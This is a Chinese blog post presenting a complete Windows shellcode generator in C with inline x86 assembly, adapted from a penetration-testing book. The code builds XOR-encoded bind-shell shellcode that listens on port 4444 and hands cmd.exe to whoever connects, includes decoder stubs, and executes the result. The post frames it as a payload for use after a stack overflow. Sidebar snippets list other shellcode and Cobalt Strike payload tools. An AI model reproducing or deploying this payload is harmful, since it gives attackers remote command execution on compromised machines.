我的Shellcode生成器

最新推荐文章于 2022-03-25 15:38:27 发布
最新推荐文章于 2022-03-25 15:38:27 发布
阅读量1.6k 收藏 1
点赞数
文章标签: byte attributes socket function null cmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/armos/article/details/2169678
版权

这个shellcode 生成器根据《网络渗透技术》中所带的示例改写,通过溢出堆栈缓冲区获得执行权限以后,将打开一个端口监听连接,创建一个新的进程运行cmd.exe,并把输入输出重定向到连接套接字,黑客通过客户端程序登录监听端口即可获得远程主机shell。

/* shellcode_port_bind.c
*
*  《网络渗透技术》演示程序
*  作者:san, alert7, eyas, watercloud
*
*  监听端口的shellcode演示
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define DEBUG_INFO

#define PROC_BEGIN __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90/
     __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90 __asm  _emit 0x90
#define PROC_END PROC_BEGIN

// kernel32.dll functions index
#define _LoadLibraryA           0x00
#define _CreateProcessA         0x04
#define _TerminateProcess       0x08
// ws2_32.dll functions index
#define _WSAStartup             0x0C
#define _WSASocketA             0x10
#define _bind                   0x14
#define _listen                 0x18
#define _accept                 0x1C
// data index
#define _port                   0x20

#define MAX_CODE_LEN            1024
#define MAX_HASH_SIZE           10

// functions number
#define _Knums                  3
#define _Wnums                  5

// Need functions
unsigned char functions[MAX_HASH_SIZE][32] =
{
    // kernel32
    {"LoadLibraryA"},       // [esi+_LoadLibraryA]
    {"CreateProcessA"},     // [esi+_CreateProcessA]
    {"TerminateProcess"},   // [esi+_TerminateProcess]
    
    // ws2_32
    {"WSAStartup"},         // [esi+_WSAStartup]
    {"WSASocketA"},         // [esi+_WSASocketA]
    {"bind"},               // [esi+_bind]
    {"listen"},             // [esi+_listen]
    {"accept"},             // [esi+_accept]
    
    // data
    {"port"},               // [esi+_port]
    {""}
};

unsigned char decode1[] =
/*
00401004   . /EB 0E         JMP SHORT encode.00401014
00401006   $ |5B            POP EBX
00401007   . |4B            DEC EBX
00401008   . |33C9          XOR ECX,ECX
0040100A   . |B1 FF         MOV CL,0FFh
0040100C   > |80340B 99     XOR BYTE PTR DS:[EBX+ECX],99
00401010   .^|E2 FA         LOOPD SHORT encode.0040100C
00401012   . |EB 05         JMP SHORT encode.00401019
00401014   > /E8 EDFFFFFF   CALL encode.00401006
*/
"/xEB/x0E"
"/x5B"
"/x4B"
"/x33/xC9"
"/xB1/xFF"          // /xFF shellcode size
"/x80/x34/x0B/x99"  // /x99 xor byte
"/xE2/xFA"
"/xEB/x05"
"/xE8/xED/xFF/xFF/xFF";

unsigned char decode2[] =
/* ripped from eyas
00406030   /EB 10           JMP SHORT 00406042
00406032   |5B              POP EBX
00406033   |4B              DEC EBX
00406034   |33C9            XOR ECX,ECX
00406036   |66:B9 6601      MOV CX,166h
0040603A   |80340B 99       XOR BYTE PTR DS:[EBX+ECX],99
0040603E  ^|E2 FA           LOOPD SHORT 0040603A
00406040   |EB 05           JMP SHORT 00406047
00406042   /E8 EBFFFFFF     CALL 00406032
00406047 xx
*/
"/xEB/x10"
"/x5B"
"/x4B"
"/x33/xC9"
"/x66/xB9/x66/x01"      // /x66/x01 166h shellcode size 
"/x80/x34/x0B/x99"      // /x99 xor byte
"/xE2/xFA"
"/xEB/x05"
"/xE8/xEB/xFF/xFF/xFF";

// shellcode function
void shellcode_c(void)
{
 __asm
 {  
        PROC_BEGIN    //C macro to begin proc
  
        jmp     locate_addr

func_start:
        pop     edi                             ; get eip
        mov     eax, fs:30h
        mov     eax, [eax+0Ch]
        mov     esi, [eax+1Ch]
        lodsd
        mov     ebp, [eax+8]                    ; base address of kernel32.dll

        mov     esi, edi                        ; esi is base of hash table

        push    _Knums
        pop     ecx
get_kfunc_addr:         ; find functions from kernel32.dll
        call    find_hashfunc_addr
        loop    get_kfunc_addr

        push    3233h                           ; "32"
        push    5F327377h                       ; "ws2_"
        push    esp
        call    dword ptr [esi+_LoadLibraryA]   ; LoadLibraryA("ws2_32");
        mov     ebp, eax                        ; ebp is base address of ws2_32.dll

        push    _Wnums
        pop     ecx        
get_wfunc_addr:         ; find functions from ws2_32.dll
        call    find_hashfunc_addr
        loop    get_wfunc_addr
        
        add     edi, 4                          ; skip port variable

        sub     esp, 190h
        push    esp
        push    101h
        call    dword ptr [esi+_WSAStartup]     ; WSAStartup(0x101, &WSADATA[0x190 bytes!])

        push    eax                             ; DWORD dwFlags
        push    eax                             ; GROUP g
        push    eax                             ; LPWSAPROTOCOL_INFOA lpProtocolInfo
        push    eax                             ; int protocol
        push    1                               ; int type
        push    2                               ; int af
        call    dword ptr [esi+_WSASocketA]     ; WSASocketA(af,type,protocol,lpProtocolInfo,g,dwFlags)
        mov     ebx, eax                        ; SOCKET s

        xor     eax, eax
        push    eax
        push    eax                             ; sockaddr_in.sin_addr = 0.0.0.0
        mov     dx, word ptr [esi+_port]
        xchg    dl, dh
        ror     edx, 10h
        mov     dx, 0x0002
        push    edx                             ; sockaddr_in.sin_port = _port
        mov     edx, esp

        push    10h                             ; int namelen
        push    edx                             ; sockaddr * addr
        push    ebx                             ; SOCKET s
        call    dword ptr [esi+_bind]           ; bind(s, addr, namelen)

        push    1                               ; int backlog
        push    ebx                             ; SOCKET s
        call    dword ptr [esi+_listen]         ; listen(s, backlog)

        push    eax                             ; OUT int * addrlen
        push    eax                             ; OUT sockaddr * addr
        push    ebx                             ; SOCKET s
        call    dword ptr [esi+_accept]         ; accept(s, addr, addrlen)

        mov     ebx, eax                        ; SOCKET sc
        push    646D63h                         ; "cmd"
        lea     edx, [esp]                      ; LPSTR lpCommandLine = "cmd"

        sub     esp, 54h                        ; LPPROCESS_INFORMATION lpProcInfo
        mov     edi, esp

        push    14h
        pop     ecx
        xor     eax, eax
stack_zero:
        mov     [edi+ecx*4], eax                ; memset(lpProcInfo, 0, 14h)
        loop    stack_zero

        mov     byte ptr [edi+10h], 44h         ; lpProcInfo.cb = sizeof(si)
        inc     byte ptr [edi+3Ch]              ; lpProcInfo.dwFlags = 0x100
        inc     byte ptr [edi+3Dh]              ; 
        mov     [edi+48h], ebx                  ; lpProcInfo.hStdInput = sc
        mov     [edi+4Ch], ebx                  ; lpProcInfo.hStdOutput = sc
        mov     [edi+50h], ebx                  ; lpProcInfo.hStdError = sc
        lea     eax, [edi+10h]

        push    edi                             ; OUT LPPROCESS_INFORMATION lpProcInfo
        push    eax                             ; LPSTARTUPINFOA            lpStartupInfo
        push    ecx                             ; LPCSTR                    lpCurrentDirectory = NULL
        push    ecx                             ; LPVOID                    lpEnvironment = NULL
        push    ecx                             ; DWORD                     dwCreationFlags = 0
        push    1                               ; BOOL                      bInheritHandles = TRUE
        push    ecx                             ; LPSECURITY_ATTRIBUTES     lpThreadAttributes = NULL
        push    ecx                             ; LPSECURITY_ATTRIBUTES     lpProcessAttributes = NULL
        push    edx                             ; LPSTR                     lpCommandLine = "cmd"
        push    ecx                             ; LPCSTR                    lpApplicationName = NULL
        call    dword ptr [esi+_CreateProcessA] ; CreateProcessA(
                                                ;   lpApplicationName,
                                                ;   lpCommandLine,
                                                ;   lpProcessAttributes,
                                                ;   lpThreadAttributes,
                                                ;   bInheritHandles,
                                                ;   dwCreationFlags,
                                                ;   lpEnvironment,
                                                ;   lpCurrentDirectory,
                                                ;   lpStartupInfo,
                                                ;   lpProcInfo)

        xor     eax, eax
        push    eax                                 ; UINT uExitCode = 0
        dec     eax
        push    eax                                 ; HANDLE hProcess = 0xFFFFFFFF
        call    dword ptr [esi+_TerminateProcess]   ; TerminateProcess(hProcess,uExitCode)

        // void find_hashfunc_addr(void)
find_hashfunc_addr:
        push    ecx
        push    esi
        mov     esi, [ebp+3Ch]                  ; e_lfanew
        mov     esi, [esi+ebp+78h]              ; ExportDirectory RVA
        add     esi, ebp                        ; rva2va
        push    esi
        mov     esi, [esi+20h]                  ; AddressOfNames RVA
        add     esi, ebp                        ; rva2va
        xor     ecx, ecx
        dec     ecx
find_start:
        inc     ecx
        lodsd
        add     eax, ebp
        xor     ebx, ebx
hash_loop:
        movsx   edx, byte ptr [eax]
        cmp     dl, dh
        jz      short find_addr
        ror     ebx, 7                          ; hash
        add     ebx, edx
        inc     eax
        jmp     short hash_loop
find_addr:
        cmp     ebx, [edi]                      ; compare to hash
        jnz     short find_start
        pop     esi                             ; ExportDirectory
        mov     ebx, [esi+24h]                  ; AddressOfNameOrdinals RVA
        add     ebx, ebp                        ; rva2va
        mov     cx, [ebx+ecx*2]                 ; FunctionOrdinal
        mov     ebx, [esi+1Ch]                  ; AddressOfFunctions RVA
        add     ebx, ebp                        ; rva2va
        mov     eax, [ebx+ecx*4]                ; FunctionAddress RVA
        add     eax, ebp                        ; rva2va
        stosd                                   ; function address save to [edi]
        pop     esi
        pop     ecx
        retn

locate_addr:
        call    func_start

        PROC_END      //C macro to end proc
    }
}

// Get function hash
unsigned long hash(unsigned char *c)
{
    unsigned long h=0;
    while(*c)
    {
        h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
    }
    return h;
}

// print shellcode
void print_shellcode(unsigned char *lpBuff, int buffsize)
{
    int i,j;
    char *p;
    char msg[4];
    
    if( buffsize<=0 )
        return;

    fprintf(stderr, "/* %d bytes, port bind shellcode *//n",buffsize);
    for(i=0;i<buffsize;i++)
    {
        if( (i%16)==0 )
        {
            if( i!=0 )
                fprintf(stderr, "/"/n/"");
            else
                fprintf(stderr, "/"");
        }
        sprintf(msg,"//x%.2X",lpBuff[i]&0xff);
        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                fprintf(stderr, "%c", _tolower(*p));
            else
                fprintf(stderr, "%c", p[0]);
        }
    }
    fprintf(stderr, "/";/n");
}

// make shellcode
void make_shellcode(unsigned short BindPort,unsigned char sc_buf[],unsigned int &sc_len)
{
    char  *         fnbgn_str = "/x90/x90/x90/x90/x90/x90/x90/x90/x90";
    char  *         fnend_str = "/x90/x90/x90/x90/x90/x90/x90/x90/x90";
    unsigned char * pShcodeAddr;            // start of the shellcode
    unsigned char ShcodeBuf[MAX_CODE_LEN];// shellcode
    unsigned char   EncodeBuf[MAX_CODE_LEN];// shellcode with xor decoder
    unsigned long dwHash[MAX_HASH_SIZE];  // function name hash table
    unsigned int dwHashSize;             // function number
    unsigned int i,j,k,l;

    // Get functions hash
    for( i=0;; i++)
 {
        if( functions[i][0] == '/x0' )
            break;

        dwHash[i] = hash(functions[i]);
#ifdef DEBUG_INFO
        fprintf(stderr, "%.8X/t%s/n", dwHash[i], functions[i]);
#endif
    }
    dwHashSize = i*4;

    // Deal with shellcode
    pShcodeAddr = (unsigned char *)shellcode_c + ((*(int *)shellcode_c) >> 8) + 5;

    // Find start of shellcode
    for ( k=0; k<MAX_CODE_LEN; ++k )
        if( memcmp( pShcodeAddr+k, fnbgn_str, 8)==0 )
            break;
    pShcodeAddr += k+8;    // start of the shellcode
    
    // Find end of shellcode
    for ( k=0; k<MAX_CODE_LEN; ++k)
        if( memcmp(pShcodeAddr+k,fnend_str, 8)==0 )
            break;
    sc_len = k;       // length of the shellcode
    
    // Copy shellcode to Buff
    memcpy(ShcodeBuf, pShcodeAddr, sc_len);

    // Add functions hash
    memcpy(ShcodeBuf+sc_len, (unsigned char *)dwHash, dwHashSize);
    sc_len += dwHashSize;

    // Modify port
    memcpy( &ShcodeBuf[sc_len-4], &BindPort, 2 );

    // print shellcode
    print_shellcode(ShcodeBuf, sc_len);

    // find xor byte
    for( i=0xff; i>0; i-- )
    {
        l = 0;
        for( j=0; j<sc_len; j++ )
        {
            // 编码以后不能出现的字符
            if( ( (ShcodeBuf[j] ^ i) == 0x00 ) ||
    ( (ShcodeBuf[j] ^ i) == 0x0D ) ||   // cr
    ( (ShcodeBuf[j] ^ i) == 0x0A ) ||
    ( (ShcodeBuf[j] ^ i) == 0x26 ) ||    // %
    ( (ShcodeBuf[j] ^ i) == 0x3d ) ||    // =
    ( (ShcodeBuf[j] ^ i) == 0x3f ) ||    // ?
    ( (ShcodeBuf[j] ^ i) == 0x40 ) ||    // @
    ( (ShcodeBuf[j] ^ i) == 0x5C ) )
            {
                l++;
                break;
            };
        }

        if ( l==0 )
        {
            printf("Use XOR Byte: 0x%02X/n", i);

            for(j=0; j<sc_len; j++)
            {
                ShcodeBuf[j] ^= i;
            }

            break;  // break when found xor byte
        }
    }

    // No xor byte found
    if ( l!=0 )
 {
        sc_len  = 0;
#ifdef DEBUG_INFO
        fprintf(stderr, "No xor byte found!/n");
#endif
    }
    else
 {
        if (sc_len > 0xFF) // use decode2
  {
            *(unsigned short *)&decode2[8] = sc_len;
            *(unsigned char *)&decode2[13] = i;

            memcpy(EncodeBuf, decode2, sizeof(decode2)-1);
            memcpy(EncodeBuf+sizeof(decode2)-1, ShcodeBuf, sc_len);
            sc_len += sizeof(decode2)-1;
        }
        else     // use decode1
  {
            *(unsigned char *)&decode1[7]  = sc_len;
            *(unsigned char *)&decode1[11] = i;

            memcpy(EncodeBuf, decode1, sizeof(decode1)-1);
            memcpy(EncodeBuf+sizeof(decode1)-1, ShcodeBuf, sc_len);
            sc_len += sizeof(decode1)-1;
        }
    }

    memcpy( sc_buf, EncodeBuf, sc_len );
}

void shellcode_main(void)
{
    unsigned char shellcode_buf[MAX_CODE_LEN];
    unsigned int  shellcode_len = 0;

    make_shellcode( 4444, shellcode_buf, shellcode_len );
    print_shellcode( shellcode_buf, shellcode_len );

    __asm
    {
        lea    eax, shellcode_buf
        jmp    eax
    }
}
armos
关注
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git下载源代码: git clone cd进入文件夹: cd pe_to_shellcode_linux 键入./build.sh 选项: -f指定要转换的exe文件 -o输出要使用的二进制shell文件 用法:pe2shellcode -f 64bitexe.exe -o shellcode.sc
探索SimpleShellcode:一款轻巧实用的shellcode生成器
最新发布
gitblog_00003的博客
04-02 530
探索SimpleShellcode:一款轻巧实用的shellcode生成器 项目地址:https://gitcode.com/c1y2m3/SimpleShellcode 在网络安全领域,shellcode是一种特殊形式的机器代码,用于在目标系统上执行攻击者指定的操作。SimpleShellcode是一个简洁且易于使用的工具,它可以帮助开发者和安全研究人员快速生成自定义的shellcode。本文将...
shellcode
赵花花08042的博客
01-28 4150
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
使用 donut 将 exe 转成 shellcode
hambaga的博客
01-19 4802
donut可以将C语言编写的EXE 转成shellcode,免杀shellcode比免杀exe简单得多。 donut 可以在github上下载,下面直接给出命令,将一个32位EXE转成shellcode。 .\donut -f .\Sharphound.exe -a1 具体参数请看文档。执行该命令会得到一个payload.bin,是二进制shellcode,你可以写一个程序把它转成C语言的数组,在程序中调用就行了。 ...
CSSG:Cobalt Strike Shellcode生成工具
weixin_43977912的博客
01-24 3668
CSSG CSSG是一款功能强大的Cobalt Strike Shellcode生成工具。本质上来说,CSSG是一个具备攻击性的Python脚本,广大研究人员可以使用它来轻松生成并格式化信标Shellcode。 该工具支持生成无阶段信标Shellcode,并带有暴露的退出方法、额外的格式化、加密、编码、压缩和多行输出等功能。 注意:Shellcode的转换通常需要按菜单顺序降序执行。 执行要求 可选的AES加密选项使用/assets文件夹中的python脚本实现。 具体取决于要安装的pycryptodome
如何获取shellcode
weixin_50273439的博客
12-14 2879
今天花了很多时间去找如何生成shellcode。目前知道的方法有 1、 直接获取(未验证) exploit database 可以看到很多OS的自带程序的shellcode,比如为windowsXP 计算器: 2、 发现了一个网站(是一位博主自己做的)可以直接导入.exe文件生成相应的shellcode,但是在我的windowsXP虚拟机里用不了,网站打不开,猜测是网络服务协议版本太低了。但在windows10主机上可以使用,正确性未测试。 在主机上随便找了个腾讯会议的.exe文件交上去,生.
CSSG:钴击Shellcode生成器
03-07
CSSG钴击Shellcode生成器Shellcode-Shellcode Generator添加到Cobalt Strike顶部菜单栏 CSSG是一种侵略者和python脚本,用于更轻松地生成和格式化信标shellcode 使用公开的退出方法,其他格式,加密,编码,压缩,...
asga:用于 ARM 目标的字母数字 Shellcode 生成器
06-18
asga(用于 ARM 目标的字母数字 Shellcode 生成器) 基于 Rix 的“Writing ia32 alphanumeric shellcodes”、来自 BerendJanWever 的“Alpha3”的循环解码思想,以及 Yves Younan 等人的 Phrack 文章“Alphanumeric...
shellcode加载器
10-02
Metasploit Framework则是一个开源的安全工具集,广泛用于漏洞利用和安全研究,其中包括生成和管理shellcode的功能。 综上所述,这个shellcode加载器的组合可能是一个用于渗透测试或研究目的的工具,使用者可以通过...
shellcode_generator:shellcode生成器,Visual Studio,C ++,Windows
03-09
在本项目"shellcode_generator"中,我们将讨论如何利用Visual Studio和C++在Windows平台上创建一个shellcode生成器。 在Windows环境中,shellcode通常与x86或x64架构相关联,这取决于目标系统。C++是一种高级编程...
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
chiralium:Windows的Shellcode-to-binary生成器
05-08
手性描述只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态...
手动制作shellcode
fanghuapyk的博客
03-19 646
概括: 我们要将自己生成的shellcode汇编文件,编译为.o文件,然后再编译为可执行文件,然后将可执行文件中的有用的代码段单独复制出来,最后我们利用python脚本将我们的这一个文件发送到测试的程序中去 一:准备shellcode文件 1将汇编代码文件shellcode_32.Asm中代码编译为shellcode_32.o文件 命令为:nasm -f elf32 -o shellcode_32.o shellcode_32.asm push 0x68 push 0x732f2f2f push 0x6e6
ShellCode生成器
Rare's Tech-Blog
08-19 6135
http://hi.baidu.com/olhack/blog/item/4eaad7b4132c15738ad4b2f6.html 黑防以前N多的文章已经介绍了ShellCode的编写,所以关于ShellCode的编写不是本文的目的。一般情况下,我们都是用汇编写好实现ShellCode功能的汇编代码,然后再提取16进制,那怎么提取呢?有人说用VC反汇编后,可以得到
Shellex:针对shellcode的转换与处理工具
weixin_43977912的博客
11-17 2536
Shellex Shellex是一款功能强大的C-shellcode转换器,可以帮助广大研究人员将C-shellcode转换为十六进制代码,并且能够在gdb、windbg、radare2、ollydbg、x64dbg、immunity调试器和010编辑器中粘贴和执行shellcode。 在Shellex的帮助下,广大研究人员可以将C-shellcode代码转换为十六进制代码,并且还可以在C编译器中编译时进行转换,整个过程只需要执行Shellex,并将shellcode代码拷贝进去并按下回车键即可。 比如说,
c语言实现shellcode转换工具
17岁boy的博客
07-12 2795
shellcode是一种小型内嵌代码,一般用于入侵,和修补漏洞的。 这种代码是非常简洁的而且跨平台性能高,因为后面博主要写关于shellcode的文章,所以今天这里给大家介绍如何使用c语言写一个能够实现汇编到机器码的转换程序 首先你需要一个汇编解释器: 这里博主已经上传到网盘: 链接:https://pan.baidu.com/s/1TuF1OeBJzAwcwVrlR4d4BQ​​​​​​...
shell脚本之shellcode自动提取工具
weixin_33817333的博客
01-08 680
  最近一直在忙着写论文。突然领导又分配任务,帮写个自动提取shellcode的脚本工具。因为之前,我们都是用objdump查看后,把shellcode一个个添加进去,很麻烦,害怕写错。所以说我们写这个工具还是挺有必要的。首先我们要先了解几个用到的命令。objdump,od,dd.这几个对于提取shellcode很有用。   objdump 有点象那个快速查看之类的工具,就是以一种可阅读的格式让...
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5459
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
C/C++ 实现ShellCode编写与提取
CSDN
07-16 9879
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
shellcode生成器
04-11
b'shellcode生成器'是用于生成恶意代码的软件。它通常被黑客用于攻击受害者的计算机系统,执行各种恶意活动,如窃取敏感信息、控制系统、启动勒索软件等。该生成器可以创建针对不同操作系统和处理器架构的shellcode,通常用于利用计算机系统中的漏洞。因此,b'shellcode生成器'是一种非常危险的工具,应该被严格控制和限制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值